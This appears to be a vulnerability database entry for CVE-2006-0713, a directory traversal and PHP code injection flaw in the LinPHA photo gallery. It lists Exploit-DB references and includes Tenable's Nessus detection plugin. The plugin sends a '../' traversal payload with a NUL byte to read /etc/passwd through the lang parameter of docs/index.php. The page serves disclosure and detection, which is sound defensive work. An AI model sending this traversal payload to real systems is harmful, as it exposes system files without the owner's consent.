Vulnerabilities > CVE-2006-0713 - Local File Inclusion and PHP Code Injection vulnerability in LinPHA

CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE

Summary

Directory traversal vulnerability in LinPHA 1.0 allows remote attackers to include arbitrary files via .. (dot dot) sequences in the (1) lang parameter in docs/index.php and the language parameter in (2) install/install.php, (3) install/sec_stage_install.php, (4) install/third_stage_install.php, and (5) install/forth_stage_install.php. NOTE: direct static code injection results from this issue, as demonstrated by inserting PHP code into the username, which is written to linpha.log, a file that is then reachable through the directory traversal.

Exploit-Db

  • description: LinPHA 0.9.x/1.0 sec_stage_install.php language Parameter Local File Inclusion. CVE-2006-0713. Webapps exploit for php platform
    id: EDB-ID:27194
    last seen: 2016-02-03
    modified: 2006-02-11
    published: 2006-02-11
    reporter: rgod
    source: https://www.exploit-db.com/download/27194/
    title: LinPHA 0.9.x/1.0 sec_stage_install.php language Parameter Local File Inclusion
  • description: LinPHA 0.9.x/1.0 install.php language Parameter Local File Inclusion. CVE-2006-0713. Webapps exploit for php platform
    id: EDB-ID:27193
    last seen: 2016-02-03
    modified: 2006-02-11
    published: 2006-02-11
    reporter: rgod
    source: https://www.exploit-db.com/download/27193/
    title: LinPHA 0.9.x/1.0 install.php language Parameter Local File Inclusion
  • description: LinPHA 0.9.x/1.0 forth_stage_install.php language Variable POST Method Local File Inclusion. CVE-2006-0713. Webapps exploit for php platform
    id: EDB-ID:27195
    last seen: 2016-02-03
    modified: 2006-02-11
    published: 2006-02-11
    reporter: rgod
    source: https://www.exploit-db.com/download/27195/
    title: LinPHA 0.9.x/1.0 forth_stage_install.php language Variable POST Method Local File Inclusion
  • description: LinPHA 0.9.x/1.0 index.php lang Parameter Local File Inclusion. CVE-2006-0713. Webapps exploit for php platform
    id: EDB-ID:27192
    last seen: 2016-02-03
    modified: 2006-02-11
    published: 2006-02-11
    reporter: rgod
    source: https://www.exploit-db.com/download/27192/
    title: LinPHA 0.9.x/1.0 index.php lang Parameter Local File Inclusion

Nessus

NASL family: CGI abuses
NASL id: LINPHA_10.NASL
description: The remote host is running LinPHA, a web photo gallery application written in PHP. The installed version of LinPHA suffers from a number of flaws, several of which could allow an unauthenticated attacker to view arbitrary files or to execute arbitrary PHP code on the remote host, subject to the privileges of the web server user id. Note that successful exploitation requires that PHP's 'magic_quotes_gpc' setting be disabled, that an attacker has the ability to create / upload / edit files on the remote host, or that the application's 'user login events log' setting be enabled.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 20892
published: 2006-02-13
reporter: This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/20892
title: LinPHA <= 1.0 Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  # Plugin identity.
  script_id(20892);
  script_version("1.18");

  # Advisory cross-references for this finding.
  script_cve_id("CVE-2006-0713");
  script_bugtraq_id(16592);

  script_name(english:"LinPHA <= 1.0 Multiple Vulnerabilities");
  script_summary(english:"Checks for multiple vulnerabilities in LinPHA <= 1.0");

  # Report text.  The string literals below continue at column 0 on
  # purpose: the line breaks and spacing are part of the reported text.
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple flaws." );
  script_set_attribute(attribute:"description", value:
"The remote host is running LinPHA, a web photo gallery application
written in PHP. 

The installed version of LinPHA suffers from a number of flaws,
several of which could allow an unauthenticated attacker to view
arbitrary files or to execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user id. 

Note that successful exploitation requires that PHP's
'magic_quotes_gpc' setting be disabled, that an attacker has the
ability to create / upload / edit files on the remote host, or that
the application's 'user login events log' setting be enabled." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2006/Feb/169" );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/424729/30/0/threaded" );
  script_set_attribute(attribute:"solution", value:
"Unknown at this time." );

  # Risk scoring and exploitability metadata.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # Plugin bookkeeping; attributes must be closed before the
  # category/family/dependency declarations that follow.
  script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/13");
  script_cvs_date("Date: 2018/11/15 20:50:17");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the check below issues live requests against the target.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Runs after web service detection; skipped entirely when the scan
  # policy disables CGI scanning or no PHP-capable server was found.
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


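include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

# Only a web server that can host PHP is a candidate for this check.
port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);


# Directories to probe.  The product's default install path is added
# only in thorough mode; otherwise the CGI directories discovered by
# earlier plugins are used as-is.
if (thorough_tests) dirs = list_uniq(make_list("/linpha", cgi_dirs()));
else dirs = make_list(cgi_dirs());

# The traversal payload does not depend on the directory, so build it
# once.  The "%00" appended to the request is a NUL byte; the error
# patterns below show the application appends ".php" to the parameter,
# which the NUL cuts off when magic_quotes_gpc is disabled.
file = "/../../../../../../../../../../etc/passwd";

foreach dir (dirs) {
  # Ask docs/index.php to include the traversed path via 'lang'.
  w = http_send_recv3(
    method:"GET",
    item:string(dir, "/docs/index.php?", "lang=", file, "%00"),
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # Evaluate the strongest indicator once; it is reused for reporting
  # below instead of running the same egrep a second time.
  got_passwd = egrep(string:res, pattern:"root:.*:0:[01]:");

  # There's a problem if...
  if (
    # there's an entry for root or...
    got_passwd ||
    # we get an error saying "failed to open stream" or "failed opening".
    #
    # nb: this suggests magic_quotes_gpc was enabled, so the file was
    #     not read, but the include path is still attacker-controlled.
    egrep(string:res, pattern:"main\(\.\./lang/lang\..+/etc/passwd\\0\.php.+ failed to open stream") ||
    egrep(string:res, pattern:"Failed opening '\.\./lang/lang\..+/etc/passwd\\0\.php' for inclusion")
  ) {
    # Initialise explicitly rather than relying on an unset variable.
    contents = NULL;
    # Keep only the leaked file: drop the page markup that follows it.
    if (got_passwd) contents = res - strstr(res, "<!DOCTYPE HTML PUBLIC");

    if (isnull(contents)) security_warning(port:port);
    else {
      # Never place raw account data in the report.
      contents = data_protection::redact_etc_passwd(output:contents);
      report = string(
        "\n",
        "Here are the contents of the file '/etc/passwd' that\n",
        "Nessus was able to read from the remote host :\n",
        "\n",
        contents
      );
      security_warning(port:port, extra:report);
    }

    exit(0);
  }
}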